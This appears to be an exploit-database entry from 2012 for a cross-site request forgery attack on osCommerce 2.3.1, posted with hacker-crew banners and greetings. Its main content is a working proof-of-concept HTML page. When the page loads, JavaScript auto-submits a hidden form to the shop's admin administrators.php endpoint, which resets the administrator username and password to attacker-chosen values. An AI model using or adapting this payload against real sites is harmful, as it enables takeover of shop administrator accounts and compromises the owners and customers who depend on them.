oscommerce-2.3.1 CSRF Change admin and Password

2012-04-05T00:00:00
ID 1337DAY-ID-17967
Type zdt
Reporter DoSs-Dz
Modified 2012-04-05T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               +---------------------------------------+              1
0               |I'm DoSs-Dz member from Inj3ct0r Team  |              1
1               +---------------------------------------+              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
+----------------------------------------------------------------------------+
# Exploit Title :  oscommerce-2.3.1 CSRF Change admin and Password 
# Date :  04 April 2012
# Site for Vendor : http://www.oscommerce.com/ext/oscommerce-2.3.1.zip
# Big Thank to : Inj3ct0r Team & Inj3ct0r Operators "CrosS"
+----------------------------------------------------------------------------+



[!1»] Exploit P0C =» 



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title> CSRF Change admin and Password By : DoSs-Dz </title>
</head>
<body onload="javascript:fireForms()">
<script language="JavaScript">
var pauses = new Array( "210","164","98" );
function pausecomp(millis)
{var date = new Date();
var curDate = null;do { curDate = new Date(); }
while(curDate-date < millis);}
function fireForms(){
 var count = 3;
 var i=0;
for(i=0; i<count; i++){
document.forms[i].submit();
pausecomp(pauses[i]);}
}</script>
<H2> CSRF Change admin and Password By : DoSs-Dz </H2>
<form method="POST" name="form1" action="http://127.0.0.1:80/xampp/1/catalog/admin/administrators.php?aID=1&action=save">
<input type="hidden" name="username" value="admin3"/>   <--- This is new user name
<input type="hidden" name="password" value="admin3"/>   <--- This is new user pass
</form>
</body>
</html>


+--------------------------------------------------------------------------------------------------------+
|[»] Greetz to =» [ Robert Miles ] , [ Black-ID ] , [ Abdou Abdo ] , [ Hacker_Dz] , [ Damane2011 ]       |
|[»] Greetz to =» [ 1337day.com ] , [ sec4ever.com ] , [ Dz4all.com ] , [ v4-team.com ] , [ Vbspiders ]  |
+--------------------------------------------------------------------------------------------------------+
+------------------------------------+ 
|./ Gharrdaia on : 04 april 2012     |
+------------------------------------+ 



#  0day.today [2018-04-04]  #